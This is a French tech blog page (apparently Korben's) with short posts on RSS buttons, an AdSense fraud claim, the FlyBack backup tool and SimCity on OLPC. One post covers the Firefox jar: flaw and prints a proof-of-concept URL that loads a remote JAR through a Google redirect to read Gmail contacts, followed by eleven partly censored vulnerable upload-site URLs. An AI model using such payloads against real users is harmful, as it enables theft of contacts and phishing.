Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

@  — 

Bouton RSS avec icône orange sur fond blanc

Vous êtes à la recherche d’un picto orginal pour lier votre flux RSS ? Alors aller jeter un coup d’oeil sur ce site qui propose gratuitement 51 boutons RSS pour le moins originaux.

51 boutons pour vos flux RSS

@  — 

Comment optimiser les revenus Adsense
Tricher avec Adsense, c’est possible… C’est ce que Manish Arora, un hacker indien a prouvé à Google simplement avec un petit Javascript.Il a réussi a gagner plusieurs milliers de dollars de revenus plubicitaires. Il n’a évidement rien touché mais à contacté Google car il voulait juste leur expliquer comment il avait fait pour que ces derniers puissent fixer ce bug. Google ne l’a pas encore contacté mais a suspendu son compte Adsense.

J’ai bien lu son explication. C’est assez simple apparement mais comme il ne donne pas le code source de son exploit, je n’ai pas pu regarder la chose donc cette info est à prendre avec des pincettes.

Les explications, avec capture écran and co, c’est par là…
Source

@  — 

Capture d'écran de l'interface de la Time Machine sur Linux

Un des points sur lesquels insiste bien Apple au sujet de son dernier née MacOS X Leopard, c’est la fonctionnalité de « Time Machine » (Machine temporelle). En fait, il s’agit d’un outil de sauvegarde de fichiers ultra simple a utiliser, permettant de retrouver des fichiers effacés ou modifiés à une date antérieure.

Alors évidement, sous Windows, il y a un truc qui s’appelle Backup and Restore et qui fonctionne une fois sur 2…Et sous Linux, il faut soit se débrouiller avec un petit script qui backup vos fichiers régulièrement, soit installer un clone de la « Time Machine »…

C’est l’objectif de FlyBack. Rendre la sauvegarde tellement simple que même votre grand mère pourrait faire ses backups sous linux. Pour le moment, c’est encore le début du projet et c’est moins joli que sous Mac (mais c’est prévu dans la roadmap d’intégrer des fenêtres qui volent), et j’espère que la sauce prendra car franchement, qu’y a t il de plus important que les backups ? (Mis à part les backups de backup ;-))

Si vous voulez tester, c’est dispo par ici.

@  — 

Illustration de la ville de Sim City avec des personnages jouant
Electronic Arts en accord avec John Gilmore, le directeur du projet OLPC (One Laptop Per Child) va installer sur les PC la première version de Sim City (1989). Je trouve que c’est vraiment du foutage de gueule ! le jeu est carrement dépassé… Ils auraient pu mettre au minimum Sim City 2000 !

Enfin, ça les changera des sites porno !

Arf !

Source

@  — 

Capture d'écran montrant une fenêtre de commande avec des commandes pour exploiter la faille JAR

Je vous avais parlé il y a quelques jours d’une nouvelle faille touchant Firefox et toutes les applications web qui acceptent de recevoir en upload des fichiers zip, jar ou odt, et doc 2007… Bref, tous les types de fichiers basés sur le protocole d’archivage JAR.

Trêve de blabla, voici un premier POC (Proof of Concept) qui démontre la gravité de la chose.

jar:http://groups.google.com/searchhistory/url?url=http://beford.org/stuff/htm.jar!/htm.htm

Si vous appelez ce lien (inoffensif je vous rassure), celui-ci executera un petit javascript qui fera croire à Google qu’il vient de son domaine (google.com) et qui lui ouvrira certaines portes comme par exemple ici l’accès à votre liste de contact Gmail. Ce script ne fait rien de méchant mais d’autres pourraient se servir de ces emails pour du spam par exemple.

Ca c’est pour le fun… maintenant, imaginez que vous vouliez récupérer la liste des fichiers ou des codes sources se trouvant dans un répertoire… En théorie, c’est possible aussi vu que le .htm contenu dans le JAR est exécuté comme si il était dans le dossier du site (donc comme si vous l’aviez envoyé directement en FTP)

Même chose en uploadant une fausse page internet d’une banque par exemple, on pourrait vous demander des informations confidentielles (ou en récupérer) sans que vous soyez vigilant.

Flippant non ?

Voici par exemple, une première liste de sites que le papa de la faille a testé et qui sont faillibles. Les noms de domaines sont censurés.

jar:http://imagXXXload.biz/files/dadfad6e3ba807aa20712fbe2.png!/test.html
jar:http://img3.freeimXXXhosting.net/uploads/328d2315c3.png!/test.html
jar:http://www.imglXXXtr.com/uploads/7accc832a7.png!/test.html
jar:http://upload.iXXXpot.com/u/07/311/05/test64864.zip.png!/test.html
jar:http://www.direcXXXload.com/showoriginal-32664.jpg!/test.html
jar:http://www.uplXXXhouse.com/fileuploads/712/712277d886fa0881092da4936f5ded10e771cd.png!/test.html
jar:http://www.fotopaXXXd.com/upload/nr/486/test.zip.png!/test.html
jar:http://www.uploXXXimages.net/imagen/18790b0b47.png!/test.html
jar:http://www.imaXXX.info/images/06/1194534977_test.zip.png!/test.html
jar:http://pics.fXXXni.de/save/p_1194532832.png!/test.html
jar:http://img.nXXXnternetstate.com/1194532968.png!/test.html

Evidement, pour le moment, c’est une grosse brêche encore ouverte parce que Firefox n’a pas encore été mis à jour. Prudence donc dans vos surfs à venir et attendez vous à voir une augmentation des alertes virales et des piratages dans les jours/mois qui vont arriver…

A bon entendeur…